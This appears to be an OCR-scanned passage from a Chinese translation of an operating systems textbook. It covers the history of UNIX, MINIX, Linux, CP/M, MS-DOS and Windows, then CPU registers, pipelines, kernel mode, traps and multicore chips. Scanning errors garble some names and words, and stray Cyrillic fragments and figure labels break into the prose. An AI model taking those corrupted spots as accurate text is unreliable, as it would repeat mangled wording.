PDP-7 机 器 ， 并 开始 开发 一 个 简化 的 、 单 用 户 版 MULTICS。 他 的 工作 后 来 导致 了 UNIX 操 作 系统 的 诞生 。 
接着 ，UNIX 在 学 术 界 ， 政 府 部 门 以 及 许多 公司 中 流行 。 

有 关 UNIX 的 历史 到 处 可 以 找到 (例如 Salus，1994)。 这 段 故 事 的 部 分 放 在 第 10 章 中 介绍 。 现 在 ， 
有 充分 理由 认为 ， 由 于 到 处 可 以 得 到 源 代码 ， 各 种 机 构 发 展 了 自己 的 (不 兼容 ) 版 本 ， 从 而 导致 了 混乱 。 
UNIX 有 两 个 主要 的 版 本 ， 源 自 AT&T 的 System V， 以 及 源 自 加 州 伯克利 大 学 的 BSD (Berkeley Software 
Distribution) 。 当 然 还 有 一 些小 的 变种 。 为 了 使 编写 的 程序 能 够 在 任何 版 本 的 UNIX 上 运行 ，IEEE 提 出 了 
一 个 UNIX 的 标准 ， 称 作 POSIX， 目 前 大 多 数 UNIX 版 本 都 支持 它 。POSIX 定 义 了 一 个 凡是 UNIX 必 须 支 
持 的 小 型 系统 调用 接口 。 事 实 上 ， 某 些 其 他 操作 系统 也 支持 POSIX 接 口 。 

顺便 值得 一 提 的 是 ， 在 1987 年 ， 本 书 作者 发 布 了 一 个 UNIX 的 小 型 克隆 ， 称 为 MINIX， 用 于 教学 目 
的 。 在 功能 上 ，MINIX 非 常 类 似 于 UNIX， 包 括 对 POSIX 的 支持 。 从 那 时 以 后 ，MINIX 的 原始 版 本 已 经 
演化 为 MINIX 3， 该 系统 是 高 度 模块 化 的 ， 并 专注 于 高 可 靠 性 。 它 具有 快速 检测 和 替代 有 故障 甚至 已 崩 
WBR 《如 MO 设备 驱动 器 ) 的 能 力 ， 不 用 重启 也 不 会 干扰 运行 着 的 程序 。 有 一 本 叙述 其 内 部 操作 ， 并 
在 附录 中 列 出 源 代码 的 书 (Tanenbaum 和 Woodhull，2006) ， 该 书 现在 仍然 有 售 。 在 因特网 的 地 址 www. 
minix3.org 上 ，MINIX3 是 免费 使 用 的 (包括 了 所 有 源 代码 )。 

对 UNIX 版 本 免费 产品 (不同 于 教育 目的 ) 的 康 望 ， 导 致 芬兰 学 生 Linus Torvalds 编 写 了 Linux。 这 
个 系统 直接 受到 在 MINIX 开 发 的 启示 ， 而 且 原本 支持 各 种 MINIX 的 功能 (例如 MINIX 文 件 系统 )。 尽 管 
它 已 经 通过 多 种 方式 扩展 ， 但 是 该 系统 仍然 保留 了 某 些 与 MINIX 和 UNIX 共 同 的 低层 结构 。 对 Linux 和 开 
放 源码 运动 具体 历史 感 兴趣 的 读者 可 以 阅读 Glyn Moody 的 书籍 (2001)。 本 书 所 叙述 的 有 关 UNIX 的 多 
数 内 容 ， 也 适用 于 System V、MINIX、Linux 以 及 UNIX 的 其 他 版 本 和 克隆 。 


1.24 第 四 代 (1980 年 至 今 ) :个 人 计算 机 

随 着 LSI (大 规模 集成 电路 ) 的 发 展 ， 在 每 平方 厘米 的 硅 片 芯片 上 可 以 集成 数 千 个 晶体 管 ， 个 人 计 
算 机 时 代 到 来 了 。 从 体系 结构 上 看 ， 个 人 计算 机 (最早 称 为 微型 计算 机 ) 与 PDP-11 并 无 二 致 ， 但 就 价格 
而 言 却 相去 其 远 。 以 往 ， 公 司 的 一 个 部 门 或 大 学 里 的 一 个 院 系 才 配备 一 台 小 型 机 ， 而 微 处 理 器 却 使 每 个 
人 都 能 拥有 自己 的 计算 机 。 

1974 年 ， 当 Intel 8080， 第 一 代 通 用 8 位 CPU 出 现时 ，Intel 希 望 有 一 个 用 于 8080 的 操作 系统 ， 部 分 是 
为 了 测试 目的 。Inmtel 请 求 其 顾问 Gary Kildall 编 写 。Kildall 和 一 位 朋友 首先 为 新 推出 的 Shugart Associates 
8 英寸 软盘 构造 了 一 个 控制 器 ， 并 把 这 个 软磁盘 同 8080 相连 ， 从 而 制造 了 第 一 个 配 有 磁盘 的 微型 计算 机 。 
然后 Kildall 为 它 写 了 一 个 基于 磁盘 的 操作 系统 ， 称 为 CP/IM (Control Program for Microcomputer), HF 
Intel 不 认为 基于 磁盘 的 微型 计算 机 有 什么 未 来 前 景 ， 所 以 当 Kildall 要 求 CP/M 的 版 权时 ，Intel 同 意 了 他 的 
要 求 。Kildall 于 是 组 建 了 一 家 公司 Digital Research， 进 一 步 开发 和 销售 CP/M。 

1977 年 ，Digital Research 重 写 了 CP/M， 使 其 可 以 在 使 用 8080、Zilog Z80 以 及 其 他 CPU 芯片 的 多 种 
微型 计算 机 上 运行 ， 从 而 使 得 CP/M 完 全 控制 了 微型 计算 机 世界 达 5 年 之 久 。 

在 20 世 纪 80 年 代 的 早期 IBM 设计 了 IBM PC 并 寻找 可 在 上 面 运行 的 软件 。 来 自 IBM 的 人 员 同 Bill 
Gates 联 系 有 关 他 的 BASIC 解 释 器 的 许可 证 事宜 ， 他 们 也 询问 是 否 他 知道 可 在 PC 机 上 运行 的 操作 系统 。 
Gates 建 议 BM 同 Digital Research 联 系 ， 即 当时 世界 上 主宰 操作 系统 的 公司 。 在 做 出 毫 无 疑问 是 近代 历史 上 
最 精 的 商业 决策 后 ，Kildall 拒 绝 与 [BM 会 见 ， 代 替 他 的 是 一 位 次 要 人 员 。 为 了 使 事情 更 精 糕 ， 他 的 律师 其 
至 拒绝 签署 BM 的 有 关 尚 未 公开 的 PC 的 保密 协议 。 结 果 ，IBM 回 头 询问 Gates 可 否 提供 他 们 一 个 操作 系统 。 

在 IBM 返 回 时 ，Gates 了 解 到 一 家 本 地 计算 机 制造 商 ，Seattle Computer Products， 有 合适 的 操作 系 
统 DOS (Disk Operating System)。 他 联系 对 方 并 提出 购买 (宣称 75 000 美 元 ) ， 对 方 接受 了 。 然 后 Gates 
提供 给 IBM 成 套 的 DOS/BASIC，IBM 也 接受 了 。IBM 和 希望 做 某 些 修改 ， 于 是 Gates 雇 佣 了 那个 写 DOS 的 
作者 ，Tim Paterson， 作 为 Gates 的 微软 公司 早期 的 一 个 雇员 ， 并 开展 工作 。 修 改版 称 为 MS-DOS 
(MicroSoft Disk Operating System)， 并 且 很 快 主导 了 IBM PC 市 场 。 同 Kildall 试 图 将 CP/M 每 次 卖 给 用 户 
一 个 产品 相 比 《至少 开始 是 这 样 )， 这 里 一 个 关键 因素 是 Gates (回顾 起 来 ， 极 其 聪明 ) 的 决策 ， 将 MS- 
DOS 与 计算 机 公司 的 硬件 捆绑 在 一 起 出 售 。 在 所 有 这 一 切 烟消云散 之 后 ，Kildall 突 然 不 幸 去 世 ， 其 
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从 来 没有 公布 过 。 

1983 年 ，IBM PC 后 续 机 型 IBM PC/AT 推 出 ， 配 有 Intel 80286 CPU。 此 时 ，MS-DOS 已 经 确立 了 地 
位 ,而 CP/M 只 剩 下 最 后 的 支撑 。MS-DOS 后 来 在 80386 和 80486 中 得 到 广泛 的 应 用 。 尽 管 MS-DOS 的 早 
期 版 本 是 相当 原始 的 ， 但 是 后 期 的 版 本 提供 了 更 多 的 先进 功能 ， 包 括 许多 源 自 UNIX 的 功能 。( 微 软 对 
UNIX 是 如 此 娴熟 ， 甚 至 在 公司 的 早期 销售 过 一 个 微型 计算 机 版 本 ， 称 为 XENIX ) 。 

用 于 早期 微型 计算 机 的 CPIM、MS-DOS 和 其 他 操作 系统 ， 都 是 通过 键盘 输入 命令 的 。 由 于 Doug 
Engelbart 于 20 世 纪 60 年 代 在 斯 坦 福 研究 院 (Stanford Research Institute) 工作 ， 这 种 情况 最 终 有 了 改变 。 
Doug Engelbart 发 明了 图 形 用 户 界面 ， 包 括 窗口 、 图 标 、 莱 单 以 及 鼠标 。 这 些 思想 被 Xerox PARC 的 研究 
人 员 采 用 ， 并 用 在 了 他 们 所 研制 的 机 器 中 。 М 

一 天 ， Steve Jobs (和 其 他 人 一 起 在 汽车 库 里 发 明了 苹果 计算 机 ) 访问 PARC, Jobs 一 看 到 GUI， 立 
即 意识 到 它 的 潜在 价值 ， 而 Xerox 管 理 层 恰好 没有 认识 到 。 这 种 战略 失误 的 庞大 比例 ， 导 致 名 为 《摸索 
未 来 》 一 书 的 出 版 Smith 与 Alexander，1988 年 )。Jobs 随 后 着 手 设 计 了 带 有 GUI 的 苹果 计算 机 。 这 个 项 
目 导致 了 Lisa 的 推出 ， 但 是 Lisa 过 于 昂贵 ， 所 以 它 在 商业 上 失败 了 。Jobs 的 第 二 次 尝试 ， 即 苹果 
Macintosh， 取 得 了 巨大 的 成 功 ， 这 不 仅 是 因为 它 比 Lisa 便 宜 得 多 ， 而 且 它 还 是 对 用 户 友好 的 (user 
friendly) ， 也 就 是 说 ， 它 是 为 那些 不 仅 没有 计算 机 知识 ， 而 且 也 根本 不 打算 学 习 计算 机 的 用 户 们 准备 的 。 
在 图 像 设计 、 专 业 数码 摄影 ， 以 及 专业 数字 视频 生产 的 创意 世界 里 ，Macintosh 得 到 广泛 的 应 用 ， 这 些 
用 户 对 苹果 公司 及 Macintosh 有 着 极 大 的 热情 。 

在 微软 决定 构建 MS-DOS 的 后 继 产 品 时 ， 受 到 了 Macintosh 成 功 的 巨大 影响 。 微 软 开 发 了 名 为 
Windows 的 基于 GUI 的 系统 ， 早 期 它 运行 在 MS-DOS 上 层 ( 它 更 像 shell 而 不 像 真 正 的 操作 系统 ) ТЕЙ, 
1985 年 至 1995 年 的 10 年 之 间 ，Windows 只 是 在 MS-DOS 上 层 的 一 个 图 形 环境 。 然 而 ， 到 了 1995 年 ， 一 个 
独立 的 Windows 版 本 ， 具 有 许多 操作 系统 功能 的 Windows 95 发 布 了 。Windows 95 仅 仅 把 底层 的 MS-DOS 
作为 启动 和 运行 老 的 MS-DOS 程 序 之 用 。1998 年 ， 一 个 稍 做 修改 的 系统 ，Windows 98 发 布 。 不 过 
Windows 95 和 Windows 98 仍 然 使 用 了 大 量 16 位 Intel 汇编 语言 

另 一 个 微软 操作 系统 是 Windows NT (NT 表示 新 技术 ) ， 它 在 一 定 的 范围 内 同 Windows 9544, {8 
是 内 部 是 完全 新 编写 的 。 它 是 一 个 32 位 系统 。Windows NT 的 首席 设计 师 是 David Cutler, 他 也 是 VAX 
VMS 操作 系统 的 设计 师 之 一 ， 所 以 有 些 VMS 的 概念 用 在 了 NT 上 。 事 实 上 ，NT 中 有 太 多 的 来 自 VMS 的 
思想 ， 所 以 VMS 的 所 有 者 DEC 公司 控告 了 微软 公司 。 法 院 对 该 案件 判决 的 结果 引出 了 一 大 笔 需要 用 多 位 
数字 表达 的 金钱 。 微 软 公 司 期 待 NT 的 第 一 个 版 本 可 以 消灭 MS-DOS 和 其 他 的 Windows 版 本 ， 因 为 NT 是 
一 个 巨大 的 超级 系统 ， 但 是 这 个 想法 失败 了 。 只 有 Windows NT 4.0 踏 上 了 成 功 之 路 ， 特别 在 企业 网 络 方 
面 取得 了 成 功 。1999 年 初 ，Windows NT 5.0 改 名 为 Windows 2000。 微 软 期 望 它 成 为 Windows 98 和 
Windows NT 4.0 的 接替 者 。 

不 过 这 两 个 方面 都 不 太 成 功 ， 于 是 微软 公司 发 布 了 Windows 98 的 另 一 个 版 本 ， 名 为 Windows Me 
(千年 版 )。2001 年 ， 发 布 了 Windows 2000 的 一 个 稍 加 升级 的 版 本 ， 称 为 Windows XP, 这 个 版 本 的 寿命 
比较 长 (6 年 )， 基 本 上 替代 了 Windows 所 有 原先 版 本 。 在 2007 年 1 月 ， 微 软 公司 发 布 了 Windows XP 的 后 
继 版 ， 名 为 Vista。 它 有 一 个 新 的 图 形 接口 Aero， 以 及 许多 其 他 新 的 或 升级 的 用 户 程序 。 微 软 公司 希望 
Vista 能 够 完全 替代 XP， 但 是 这 个 过 程 可 能 需要 将 近 十 年 的 时 间 。 

在 个 人 计算 机 世界 中 ， 另 一 个 主要 竞争 者 是 UNIX (和 它 的 各 种 变 体 ) 。 UNIX 在 网 络 和 企业 服务 器 等 
领域 强大 ， 在 台式 计算 机 上 ， 特 别 是 在 诸如 印度 和 中 国 这 些 发 展 中 国家 里 ，UNIX 的 使 用 也 在 增加 。 在 基 
于 Pentium 的 计算 机 上 ，Linux 成 为 学 生 和 不 断 增加 的 企业 用 户 们 代替 Windows 的 通行 选择 。 顺便 提 及 ， 
在 本 书 中 ， 我 们 使 用 “Pentium” 这 个 名 词 代表 Pentium I，I，II 和 4， 以 及 它们 的 后 继 者 ， 请 如 Core 2 
Duo 等 。 术 语 x86 有 了 时 仍旧 用 来 表示 Intel 公 司 的 包括 8086 的 CPU， 而 “Pentium” 则 用 于 表示 从 Pentium IF 
始 的 所 有 CPU。 很 显然 ， 这 个 术语 并 不 完美 ， 但 是 没有 更 好 的 方案 。 人 们 很 奇怪 ， 是 Intel 公 司 的 哪个 天 
才 把 半 个 世界 都 知晓 和 尊重 的 品牌 名 Pentium) 扔 掉 ， 并 赫 代 以 “ Core 2 Duo” 这 样 一 个 几乎 没有 人 立 
即 理解 的 术语 一 一 “2” 是 什么 意思 ， 而 “Duo” 又 是 什么 意思 ? 也 许 “Pentium 5” (或 者 “Pentium 5 
dual соге”) 太 难 于 记忆 吧 。 至 于 FreeBSD， 一 个 源 自 于 Berkeley 的 BSD 项 目 ， 也 是 -个 流行 的 UNIX 变 体 。 
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所 有 现代 Macintosh 计 算 机 都 运行 着 FreeBSD 的 一 个 修改 版 。 在 使 用 高 性 能 RISC 芯 片 的 工作 站 上 ， 诸 如 
Hewlett-Packard 公司 和 Sun Microsystems 公 司 销售 的 那些 机 器 上 ，UNIX 系 统 也 是 一 种 标准 配置 。 

尽管 许多 UNIX 用 户 ， 特 别 是 富有 经 验 的 程序 员 们 更 偏好 基于 命令 的 界面 而 不 是 GUI， 但 是 几乎 所 
有 的 UNIX 系 统 都 支持 由 MIT 开 发 的 称 为 X Windows 的 视窗 系统 (如 众所周知 的 X11) 。 这 个 系统 处 理 基 
本 的 视窗 管理 功能 ， 人 允许 用 户 通过 鼠标 创建 、 删 除 、 移 动 和 变 比 视窗 。 对 于 那些 希望 有 图 形 系统 的 
UNIX 用 户 ， 通 常 在 X 11 之 上 还 提供 一 个 完整 的 GUI， 诸 如 Gnome 或 KDE， 从 而 使 得 UNIX 在 外 观 和 感觉 
上 类 似 于 Macintosh 或 Microsoft Windows。 

另 一 个 开始 于 20 世 纪 80 年 代 中 期 的 有 趣 发 展 是 ， 那 些 运行 网 络 操作 条 统 和 分 布 式 操作 系统 
(Tanenbaum 和 Van Steen, 2007) 的 个 人 计算 机 网 络 的 增长 。 在 网 络 操作 系统 中 ， 用 户 知道 多 台 计 算 机 
的 存在 ， 用 户 能 够 登录 到 一 台 远 地 机 器 上 并 将 文件 从 一 台 机 器 复制 到 另 一 台 机 器 ， 每 台 计 算 机 都 运行 自 
己 本 地 的 操作 系统 ， 并 有 自己 的 本 地 用 户 (或 多 个 用 户 )。 

网 络 操作 系统 与 单 处 理 器 的 操作 系统 没有 本 质 区别 。 很 明显 ， 它 们 需要 一 个 网 络 接口 控制 器 以 及 一 
些 低层 软件 来 驱动 它 ， 同 时 还 需要 一 些 程序 来 进行 远程 登录 和 远程 文件 访问 ， 但 这 些 附 加 成 分 并 未 改变 
操作 系统 的 本 质 结构 。 

相反 ， 分 布 式 操作 系统 是 以 一 种 传统 单 处 理 器 操作 系统 的 形式 出 现在 用 户 面前 的 ， 尽 管 它 实际 上 是 
由 多 处 理 器 组 成 的 。 用 户 应 该 不 知晓 他 们 的 程序 在 何 处 运行 或 者 他 们 的 文件 存放 于 何 处 ， 这 些 应 该 由 操 
作 系 统 自动 和 有 效 地 处 理 。 

真正 的 分 布 式 操作 系统 不 仅仅 是 在 单机 操作 系统 上 增添 一 小 段 代码 ， 因 为 分 布 式 系统 与 集中 式 系统 
有 本 质 的 区 别 。 例 如 ， 分 布 式 系统 通常 允许 一 个 应 用 在 多 台 处 理 器 上 同时 运行 ， 因 此 ， 需 要 更 复杂 的 处 
理 器 调度 算法 来 获得 最 大 的 并 行 度 优化 。 

网 络 中 的 通信 延迟 往往 导致 分 布 式 算法 必须 能 适应 信息 不 完备 、 信 息 过 时 甚至 信息 不 正确 的 环境 。 
这 与 单机 系统 完全 不 同 ， 对 于 后 者 ， 操 作 系统 掌握 着 整个 系统 的 完备 信息 。 
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操作 系统 与 运行 该 操作 系统 的 计算 机 硬件 联系 密切 。 操 作 系统 扩展 了 计算 机 指令 集 并 管理 计算 机 的 
资源 。 为 了 能 够 工作 ， 操 作 系 统 必须 了 解 大 量 的 硬件 ， 至 少 需 要 了 解 硬件 如 何 面 对 程序 员 。 出 于 这 个 原 
因 ， 这 里 我 们 先 简要 地 介绍 现代 个 人 计算 机 中 的 计算 机 硬件 ， 然 后 开始 讨论 操作 系统 的 具体 工作 细节 。 

从 概念 上 讲 ， 一 台 简单 的 个 人 计算 机 可 以 抽象 为 类 似 于 图 1-6 中 的 模型 。CPU、 内 存 以 及 1/O 设 备 都 
由 一 条 系统 总 线 连接 起 来 并 通过 总 线 与 其 他 设备 通信 。 现 代 个 人 计算 机 结构 更 加 复杂 ， 包 含 多 重 总 线 
我 们 将 在 后 面 讨论 之 。 目 前 ， 这 一 模式 还 是 够 用 的 。 在 下 面 各 小 节 中 ， 我 们 将 简要 地 介绍 这 些 部 件 ， 并 
且 讨论 一 些 操作 系统 设计 师 们 所 考虑 的 硬件 问题 。 毫 无 疑问 ， 这 是 一 个 非常 简要 的 概括 介绍 。 现 在 有 不 
少 讨论 计算 机 硬件 和 计算 机 组 织 的 书籍 。 其 中 两 本 有 名 的 书 的 作者 分 别 是 Tanenbaum (2006) 和 Patterson 
与 Hennessy (2004), 
监视 器 та ні 
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图 1-6 简单 个 人 计算 机 中 的 一 些 部 件 
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1.3.1 处 理 器 

计算 机 的 “大 脑 ” 是 CPU， 它 从 内 存 中 取出 指令 并 执行 之 。 在 每 个 CPU 基 本 周期 中 ， 首 先 从 内 存 中 
取出 指令 ， 解 码 以 确定 其 类 型 和 操作 数 ， 接 着 执行 之 ， 然 后 取 指 、 解 码 并 执行 下 一 条 指令 。 按 照 这 一 方 
R, 程序 被 执行 完成 。 

每 个 CPU 都 有 其 一 套 可 执行 的 专门 指令 集 。 所 以 ，Pentium 不 能 执行 SPARC 程 序 ， 而 SPARC 也 不 能 
执行 Pentium 程 序 。 由 于 用 来 访问 内 存 以 得 到 指令 或 数据 的 时 间 要 比 执行 指令 花费 的 时 间 长 得 多 ， 因 此 ， 
所 有 的 CPU 内 都 有 一 些 用 来 保存 关键 变量 和 临时 数据 的 寄存 器 。 这 样 ， 通 常 在 指令 集中 提供 一 些 指令 ， 
用 以 将 一 个 字 从 内 存 调和 寄存器， 以 及 将 一 个 字 从 寄存 器 存 人 内 存 。 其 他 的 指令 可 以 把 来 自 寄存 器 、 内 
存 的 操作 数组 合 ， 或 者 用 两 者 产生 一 个 结果 ， 诸 如 将 两 个 字 相 加 并 把 结果 存在 寄存 器 或 内 存 中 。 

除了 用 来 保存 变量 和 临时 结果 的 通用 寄存 器 之 外 , 多 数 计算 机 还 有 一 些 对 程序 员 可 见 的 专门 寄存 器 。 
其 中 之 一 是 程序 计数 器 ， 它 保存 了 将 要 取出 的 下 一 条 指令 的 内 存 地 址 。 在 指令 取出 之 后 ， 程 序 计数 器 就 
被 更 新 以 便 指向 后 继 的 指令 。 

另 一 个 寄存 器 是 堆栈 指针 ， 它 指向 内 存 中 当前 栈 的 顶端 。 该 栈 含有 已 经 进入 但 是 还 没有 退出 的 每 个 
过 程 的 一 个 框架 。 在 一 个 过 程 的 堆栈 框架 中 保存 了 有 关 的 输入 参数 、 局 部 变量 以 及 那些 没有 保存 在 寄存 
器 中 的 临时 变量 。 

当然 还 有 程序 状态 字 (Program Status Word，PSW) 寄存 器 。 这 个 寄存 器 包含 了 条 件 码 位 (由 比较 
指令 设置 )、CPU 优 先 级 、 模 式 (用 户 态 或 内 核 态 )， 以 及 各 种 其 他 控制 位 。 用 户 程序 通常 读 和 整个 PSW， 
但 是 ， 只 对 其 中 的 少量 字段 写 人 。 在 系统 调用 和 1/O 中 ，PSW 的 作用 很 重要 。 

操作 系统 必须 知晓 所 有 的 寄存 器 。 在 时 间 多 路 复 用 (time multiplexing) CPU 中 ， 操 作 系统 经 常会 
中 止 正在 运行 的 某 个 程序 并 启动 (或 再 启动 ) 另 一 个 程序 。 每 次 停止 一 个 运行 着 的 程序 时 ， 操 作 系统 必 
须 保存 所 有 的 寄存 器 ， 这 样 在 稍 后 该 程序 被 再 次 运行 时 ， 可 以 把 这 些 寄存 器 重新 装 入 。 

为 了 改善 性 能 ，CPU 设 计 师 早 就 放弃 了 同时 读 取 、 解 码 和 执行 一 条 指令 的 简单 模型 。 许 多 现代 CPU 具 
有 同时 取出 多 条 指令 的 机 制 。 例 如 ， 一 个 CPU 可 以 有 分 开 的 取 指 单元 、 解 码 单元 和 执行 单元 ， 于 是 当 它 执 
行 指令 n 时 ， 它 还 可 以 对 指令 n + 1 解码 ， 并 且 读 取 指令 nm + 2。 这 样 一 种 机 制 称 为 流水 线 (pipeline)， 在 图 
1-7a 中 是 一 个 有 着 三 个 阶段 的 流水 线 示意 图 。 更 长 的 流水 线 也 是 常见 的 。 在 多 数 的 流水 线 设计 中 ， 一 旦 一 
条 指令 被 取 进 流水 线 中 ， 它 就 必须 被 执行 完毕 ,即便 前 一 条 取出 的 指令 是 条 件 转移 ， 它 也 必须 被 执行 完毕 。 
流水 线 使 得 编译 器 和 操作 系统 的 编写 者 很 头疼 ， 因 为 它 造 成 了 在 机 器 中 实现 这 些 软件 的 复杂 性 问题 。 


取 指 解码 执行 


а 
图 1-7 a) 有 三 个 阶段 的 流水 线 ，b) 一 个 超标 量 CPU 


比 流水 线 更 先进 的 设计 是 一 种 超标 量 CPU， 如 图 1-7b 所 示 。 在 这 种 设计 中 ， 有 多 个 执行 单元 ， 例 如 ， 
一 个 CPU 用 于 整数 算术 运算 ， 一 个 CPU 用 于 浮 点 算术 运算 ， 而 另 一 个 用 于 布尔 运算 。 两 个 或 更 多 的 指令 
被 同时 取出 、 解 码 并 装 和 人 一 个 保持 缓冲 区 中 ， 直 至 它们 执行 完毕 。 只 要 有 一 个 执行 单元 空 站 ， 就 检查 保 
持 缓冲 区 中 是 否 还 有 可 处 理 的 指令 ， 如 果 有 ， 就 把 指令 从 缓冲 区 中 移出 并 执行 之 。 这 种 设计 存在 一 种 隐 
含 的 作用 ， 即 程序 的 指令 经 常 不 按 顺 序 执行 。 在 多 数 情况 下 ， 硬 件 负责 保证 这 种 运算 的 结果 与 顺序 执行 
指令 时 的 结果 相同 ， 但 是 ， 仍 然 有 部 分 令 人 烦恼 的 复杂 情形 被 强加 给 操作 系统 处 理 ， 我 们 在 后 面 会 讨论 
这 种 情况 。 

除了 用 在 代 和 人 式 系统 中 的 非常 简单 的 CPU 之 外 ， 多 数 CPU 都 有 两 种 模式 ， 即 前 面 已 经 提 及 的 内 核 态 
和 用 户 态 。 通 常 ， 在 PSW 中 有 一 个 二 进 制 位 控制 这 两 种 模式 。 当 在 内 核 态 运行 时 ，CPU 可 以 执行 指令 集 
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中 的 每 一 条 指令 ， 并 且 使 用 硬件 的 每 种 功能 。 操 作 系统 在 内 核 态 下 运行 ， 从 而 可 以 访问 整个 硬件 。 

相反 ， 用 户 程序 在 用 户 态 下 运行 ， 仅 允许 执行 整个 指令 集 的 一 个 子 集 和 访问 所 有 功能 的 一 个 子 集 。 

- 般 而 言 ， 在 用 户 态 中 有 关 IO 和 内 存 保护 的 所 有 指令 是 禁止 的 。 当 然 ， 将 PSW 中 的 模式 位 设置 成 内 核 

态 也 是 禁止 的 。 

为 了 从 操作 系统 中 获得 服务 ， 用 户 程序 必须 使 用 系统 调用 (system call) 系统 调用 陷入 内 核 并 调用 
操作 系统 。TRAP 指 令 把 用 户 态 切换 成 内 核 态 ， 并 启用 操作 系统 。 当 有 关 工作 完成 之 后 ， 在 系统 调用 后 
面 的 指令 把 控制 权 返 回 给 用 户 程序 。 在 本 章 的 后 面 我 们 将 具体 解释 系统 调用 过 程 ， 但 是 在 这 里 ， 请 读者 
把 它 看 成 是 一 个 特别 的 过 程 调用 指令 ， 该 指令 具有 从 用 户 态 切换 到 内 核 态 的 特别 能 力 。 作 为 排 印 上 的 说 
明 ， 我 们 在 行文 中 使 用 小 写 的 Helvetica 字 体 ， 表 示 系 统 调 用 ， 比 如 read。 

有 必要 指出 ， 计 算 机 使 用 陷阱 而 不 是 一 条 指令 来 执行 系统 调用 。 其 他 的 多 数 陷阱 是 由 硬件 引起 的 ， 
用 于 警告 有 异常 情况 发 生 ， 诸 如 试图 被 零 除 或 浮 点 下 溢 等 。 在 所 有 的 情况 下 ， 操 作 系 统 都 得 到 控制 权 并 
决定 如 何 处 理 异常 情况 。 有 了 时， 由 于 出 错 的 原因 程序 不 得 不 停止 。 在 其 他 情况 下 可 以 忽略 出 错 (ШЕШ 
数 可 以 被 置 为 零 ) 。 最 后 ， 若 程序 已 经 提前 宣布 它 希 望 处 理 某 类 条 件 时 ， 那么 控制 权 还 必须 返回 给 该 程 
序 ， 让 其 处 理 相关 的 问题 。 

多 线程 和 多 核 芯片 

Moore 定律 指出 ,芯片 中 晶体 管 的 数量 每 18 个 月 翻 一 备 。 这 个 “定律 ”并 不 是 物理 学 上 的 某 种 规律 ， 
诸如 动量 守恒 定律 等 ， 它 是 Intel 公 司 的 共同 创始 人 Gordon Moore 对 半导体 公司 如 何 能 快速 缩小 晶体 管 
能 力 上 的 一 个 观察 结果 。Moore 定律 已 经 保持 了 30 年 ， 有 希望 至 少 再 保持 10 年 。 

使 用 大 量 的 晶体 管 引发 了 一 个 问题 : 如 何 处 理 它们 昵 ? 这 里 我 们 可 以 看 到 一 种 处 理 方式 ， 具有 多 个 
功能 部 件 的 超标 量 体 系 结构 。 但 是 ， 随 着 晶体 管 数量 的 增加 ， 再 多 晶体 管 也 是 可 能 的 。 一 件 由 此 而 来 的 
必然 结果 是 ， 在 CPU 芯片 中 加 入 了 更 大 的 缓存 ， 人 们 肯定 会 这 样 做 ， 然 而 ， 原先 获得 的 有 用 效果 将 最 终 
消失 掉 。 

显然 ， 下 一 步 不 仅 是 有 多 个 功能 部 件 ， 某 些 控制 远 辑 也 会 出 现 多 个 。Pentium 4 和 其 他 一 些 CPU 芯 
片 就 是 这 样 做 的 ， 称 为 多 线程 (multithreading) 或 超 线程 (hyperthreading， 这 是 Intel 公 司 给 出 的 名 称 ) 。 
近似 地 说 ， 多 线程 允许 CPU 保持 两 个 不 同 的 线程 状态 ， 然 后 在 纳 秒 级 的 时 间 尺 度 内 来 回 切换 。( 线 程 是 
一 种 轻 量 级 进程 ， 也 即 一 个 运行 中 的 程序 。 我 们 将 在 第 2 章 中 具体 讨论 ) 。 例 如 ， 如 果 某 个 进程 需要 从 内 
存 中 读 出 一 个 字 (需要 花费 多 个 时 钟 周期 ) ， 多 线程 CPU 则 可 以 切换 至 另 一 个 线程 。 多 线程 不 提供 真正 
的 并 行 处 理 。 在 一 个 时 刻 只 有 一 个 进程 在 运行 ， айд Даа бызда аа 

多 线程 对 操作 系统 而 言 是 有 意义 的 ， 因 为 每 个 -一 
线程 在 操作 系统 看 来 就 像 是 单个 的 CPU。 考 虑 一 个 
实际 有 两 个 CPU 的 系统 ， 每 个 CPU 有 两 个 线程 。 这 
样 操作 系统 将 把 它 看 成 是 4 个 CPU。 如 果 在 某 个 时 间 
的 特定 点 上 ， 只 有 能 够 维持 两 个 CPU 忙碌 的 工作 量 ， 
那么 在 同一 个 CPU 上 调度 两 个 线程 ， 而 让 另 一 个 
CPU 完全 空转 ， 就 没有 优势 了 。 这 种 选择 远 远 不 如 
在 每 个 CPU 上 运行 一 个 线程 的 效率 高 。Pentium 4 的 
后 继 者 ，Core (还 有 Core 2) 的 体系 结构 并 不 支持 
超 线程 ， 但 是 Intel 公 司 已 经 宣布 ，Core 的 后 继 者 会 
具有 超 线程 能 力 。 图 1-8 а) 带 有 共享 L2 缓 存 的 4 核 芯片 ， 

除了 多 线程 ， 还 出 现 了 包含 2 个 或 4 个 完整 处 理 b) 带 有 分 离 L2 缓 在 的 4 核 艺 片 
器 或 内 核 的 CPU 芯片 。 图 1-8 中 的 多 核 芯片 上 有 效 地 
装 有 4 个 小 芯片 ， 每 个 小 芯片 都 是 一 个 独立 的 CPU。 (后 面 将 解释 缓存 .) 要 使 用 这 类 多 核 芯片 肯定 需要 
多 处 理 器 操作 系统 。 


1.3.2 存储 器 
在 任何 一 种 计算 机 中 的 第 二 种 主要 部 件 都 是 存储 器 。 在 理想 情形 下 ， 存 储 器 应 该 极为 迅速 ( 快 于 执 
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行 一 条 指令 ， 这 样 CPU 不 会 受到 存储 器 的 限制 )， 充 分 大 ， 并 且 非 常 便宜 。 但 是 目前 的 技术 无 法 同时 满 


足 这 三 个 目标 ， 于 是 出 现 了 不 同 的 处 理 方 。 典型 的 访问 时 间 典型 的 容量 
式 。 存 储 器 系统 采用 一 种 分 层次 的 结构 ， Ins <1кв 

如 图 1-9 所 示 。 顶 层 的 存储 器 速度 较 高 ， 容 е аа 
量 较 小 ， 与 底层 的 存储 器 相 比 每 位 成 本 较 ы Жолой ан 
高 ， 其 差别 往往 是 十 亿 数量 级 。 ШӘ. одан 


存储 器 系统 的 顶层 是 CPU 中 的 寄存 
器 。 它 们 用 与 CPU 相同 的 材料 制 成 ， 所 以 。 图 1.9 典型 的 存储 层次 结构 ， 图 中 的 数据 是 非常 粗略 的 估计 
和 CPU 一 样 快 。 显 然 ， 访 问 它们 是 没有 时 
延 的 。 其 典型 的 存储 容量 是 ， 在 32 位 CPU 中 为 32 x 32 位 ， 而 在 64 位 CPU 中 为 64 x 64 位 。 在 这 两 种 情形 
